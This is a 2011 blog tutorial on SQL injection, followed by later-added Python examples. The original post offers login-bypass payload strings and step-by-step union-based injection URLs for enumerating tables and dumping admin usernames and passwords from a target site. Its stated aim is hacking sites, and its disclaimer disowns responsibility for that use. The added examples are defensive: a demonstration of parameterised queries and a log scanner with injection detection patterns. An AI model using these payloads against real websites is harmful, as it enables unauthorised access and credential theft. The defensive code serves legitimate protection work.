Tuesday, February 8, 2011

SQL INJECTION IN DETAIL


Today I am posting this article after so many days because I was busy with placement-related stuff.
Hello guys, my last post was on "prevention against SQLI", so I decided to write about the SQL injection attack :P. Here I will explain everything briefly, but make sure that you won't use this information for wrong things, as I don't take any responsibility for what you guys do with this information; it's all up to you :)
So let's start. Today I will explain:
1 STRING INJECTION : to bypass login form authentication.
2 UNION SELECT
3 BLIND SQLI
4 ERROR BASED SQL INJECTION   /* in MSSQL I have not tried this one, but I will post about it also */

1. So let's start with the first one. This is so simple that anyone can try his/her hand at bypassing login form security using this method. In this method you first have to find the admin login page of the site you want to hack. You can find it using your intelligence or some freely available tools. Now after getting the login page, all you have to do is enter the administrator's username and password and you are done.
Let's move on to the second method.....hahahaha......don't get angry... we still have some work to do after getting the login page, because we don't have the admin's username and password.
Now if you are lucky enough, your target may be vulnerable to this attack. All you have to do is write the following information into the form:

USERNAME : admin, administrator, master, manager, targetsite_admin, %admin%, or you can try some other common username; in most cases one of these will work, depending on your luck :P
PASSWORD : in the password field use any of these strings:
' or 1=1--
" or 1=1--
or 1=1--
1'or'1'='1
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
Finally you are done. If your target is vulnerable you will get access for sure.
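Why those strings work, and what stops them, as an added example that is not code from the original post: a throwaway in-memory SQLite database stands in for the site's user table (the table name `admin`, the column names and the stored row are all constructed here). `login_vulnerable` splices the form fields into the SQL text the way a vulnerable login form does; `login_safe` binds them as parameters, so the very same input is compared as data and the bypass fails.

```python
import sqlite3

# Constructed stand-in for the site's user table: hypothetical table and
# column names, throwaway data, in-memory SQLite so it runs offline.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('admin', 'correct-horse-battery')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """The pattern the post exploits: form fields spliced into the SQL text.

    With password = ' or 1=1-- the statement becomes
      ... WHERE username='admin' AND password='' or 1=1--'
    The quote closes the literal, OR 1=1 makes the WHERE clause true for
    every row, and -- comments out the dangling quote.
    """
    sql = ("SELECT username FROM admin WHERE username='%s' AND password='%s'"
           % (username, password))
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        # A real application would show an error page here (this toy one
        # hits this branch for the parenthesised variants in the list above,
        # whose quoting does not fit this particular statement).
        return None
    return row[0] if row else None

def login_safe(conn, username, password):
    """Fix: bind parameters. The statement text is fixed and the values travel
    separately, so quotes, OR and -- inside them are compared as data."""
    sql = "SELECT username FROM admin WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

def compare(conn, payloads):
    """For each password string, report whether it logs in as 'admin' against
    the vulnerable query and against the parameterised one."""
    return {p: (login_vulnerable(conn, "admin", p) == "admin",
                login_safe(conn, "admin", p) == "admin") for p in payloads}

if __name__ == "__main__":
    db = make_db()
    results = compare(db, ["' or 1=1--", "' or 'a'='a", "1'or'1'='1", "wrong"])
    for payload, (vuln, safe) in results.items():
        print("%-14s vulnerable=%s parameterised=%s" % (payload, vuln, safe))
```

The only difference between the two functions is who builds the statement: in the vulnerable one the database parser sees the user's quote and `--`, in the safe one it never does. The same rule applies to every other parameter the post uses later, including the numeric `id` in the URL.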

2. Union method: now let's move on to some real work. In this one you have to do everything manually, using your mind and skills, so let's start the job.
>>> >>> >>> 
Let's start with the union attack:
Our aim is to find the TABLE NAME, the COLUMN NAME and then the username and password.

=> http://targetsite.com/index.php?id=1 order by 10--
^ This gives me an error
keep trying
=> http://targetsite.com/index.php?id=1 order by 7--
^ again error arggg!!!! i hate it
keep trying
=> http://targetsite.com/index.php?id=1 order by 5--
the page loads normally.........woooooohh 
It means the number of columns = 5
Now the next part:
using the union select statement.
=> http://targetsite.com/index.php?id=1 union all select 1,2,3,4,5--
If it doesn't give you anything, change the first part of the query to a negative value.
=> http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5--
It'll show some number on your screen. Let's say it is 2. Now we know that column 2 will echo data back to us. :D

Now getting the MySQL version:
=> http://targetsite.com/index.php?id=-1 union all select 1,@@version,3,4,5--
If you don't get it with this, try this:
=> http://targetsite.com/index.php?id=-1 union select 1,version(),3,4,5--
Now you will get the version name.
It can be:
==> 5+ /* version 5 or above */
==> 5> /* version below 5 */

Now extracting tables for version 5+:
=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables--

It'll show a lot of tables; if you want to get admin privileges in order to hack the site, then you are looking for the "admin" table. 
Now I have the table names and I need to extract the column names from them, so the query will be:

=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=admin--

This will show you the column names inside the table admin. If it gives you an error, you need to convert the text value admin into MySQL CHAR() form. Use HackBar, a Firefox add-on, to do so, OR use any other tool, OR write it yourself if you know the ASCII value of every character.
So the CHAR form of admin is => CHAR(97, 100, 109, 105, 110)
therefore the query will be:

=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

It will show you many columns, but we only need the username and password columns.

=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(user_name,0x3a,user_password),3,4,5 from admin--
/* where 0x3a is the hex value of : (colon) */

Wooooohhh, it's time to party: you've got the admin name and password.
The password can also be encrypted, so you can use decrypters to decode it.
This was all for MySQL 5+
=============================================================
Let's start with MySQL versions below 5: 
Version 4 (anything below 5) does not contain information_schema.
This method is all about guessing :p
We know the number of columns, that is 5.
=> Let's start guessing the table:
=> http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5 from users--
^ got an error... give it one more try 
=> http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5 from Admin--
^ Suppose this does not give me an error; it means it worked and we got the table name 

==> Next part is guessing the columns:
as we found earlier, the vulnerable column is 2... so let's proceed further.
=> http://targetsite.com/index.php?id=-1 union all select 1,user,3,4,5 from admin--
^ got an error. shit!!!!!! 
=> http://test.com/index.php?id=-1 union all select 1,username,3,4,5 from admin--
^ no error..... yes, I got the column name

==> Let's guess the password column now

=> http://test.com/index.php?id=-1 union all select 1,pass,3,4,5 from admin--
^ got an error, one more try:
=> http://targetsite.com/index.php?id=-1 union all select 1,password,3,4,5 from admin--

We did it, we got the password column successfully, so cheers

This is the end of the union method for MySQL; you can try the same for MSSQL. Wait for my next post, where I will write about both blind injection and error based injection :)
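On the defending side, every step of the union method above, and the table/column guessing for MySQL below 5, leaves a distinctive trail in the web server's access log: `order by N--` probes that alternate between error and normal pages, `union all select`, `@@version`, `information_schema` and `group_concat(`. The following is an added example, not part of the original post: it runs a small set of signatures over constructed Apache-style log lines (the IPs, timestamps and sizes are made up) and reports which clients are worth investigating. It decodes the URL first, because the spaces in the URLs shown above reach the server as `%20` or `+`.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined-style); not from any
# real server. 203.0.113.7 walks through the probing sequence described in
# the post; 198.51.100.20 is ordinary traffic, including a benign "union".
SAMPLE_LOG = """\
203.0.113.7 - - [08/Feb/2011:10:01:02 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5120
203.0.113.7 - - [08/Feb/2011:10:01:09 +0000] "GET /index.php?id=1%20order%20by%2010-- HTTP/1.1" 500 312
203.0.113.7 - - [08/Feb/2011:10:01:15 +0000] "GET /index.php?id=1%20order%20by%205-- HTTP/1.1" 200 5120
203.0.113.7 - - [08/Feb/2011:10:01:40 +0000] "GET /index.php?id=-1+union+all+select+1,2,3,4,5-- HTTP/1.1" 200 4980
203.0.113.7 - - [08/Feb/2011:10:02:03 +0000] "GET /index.php?id=-1+union+all+select+1,@@version,3,4,5-- HTTP/1.1" 200 4990
203.0.113.7 - - [08/Feb/2011:10:02:30 +0000] "GET /index.php?id=-1+union+all+select+1,group_concat(table_name),3,4,5+from+information_schema.tables-- HTTP/1.1" 200 6100
198.51.100.20 - - [08/Feb/2011:10:03:00 +0000] "GET /index.php?id=42 HTTP/1.1" 200 5200
198.51.100.20 - - [08/Feb/2011:10:03:05 +0000] "GET /search.php?q=union+square+hotels HTTP/1.1" 200 8000
"""

# client, timestamp, method, URL, status from a combined-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Each signature matches one step of the technique in the post. union_select
# requires the SELECT so that a plain word "union" in a search box is ignored.
SIGNATURES = [
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("version_probe", re.compile(r"@@version|\bversion\s*\(", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\b", re.I)),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("trailing_sql_comment", re.compile(r"--\s*$")),
]

def normalise(url):
    # %20 and + both become spaces; runs of whitespace collapse to one so the
    # \s+ in the signatures behave predictably.
    return re.sub(r"\s+", " ", unquote_plus(url))

def classify(url):
    """Names of the signatures that match the decoded URL (empty if clean)."""
    text = normalise(url)
    return [name for name, rx in SIGNATURES if rx.search(text)]

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, url, status = m.groups()
    return {"ip": ip, "time": ts, "method": method, "url": url, "status": int(status)}

def scan(log_text):
    """Flagged requests, in log order, each with the signatures it tripped."""
    flagged = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        rules = classify(rec["url"])
        if rules:
            rec["rules"] = rules
            flagged.append(rec)
    return flagged

def suspicious_clients(log_text, min_hits=2):
    """Clients with at least min_hits flagged requests; one hit can be a
    false positive, a sequence of them is the probing pattern from the post."""
    counts = {}
    for rec in scan(log_text):
        counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= min_hits}

if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["ip"], rec["status"], ",".join(rec["rules"]), normalise(rec["url"]))
    print("clients to investigate:", suspicious_clients(SAMPLE_LOG))
```

Run against the sample, the five probing requests from 203.0.113.7 are flagged and the two from 198.51.100.20 are not; the 500-then-200 pair on the `order by` lines is the error/normal oscillation the post relies on to count columns, so status codes are worth keeping alongside the matched signatures. These signatures are deliberately strict and are a starting point for a detection rule, not a substitute for parameterised queries on the application side.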
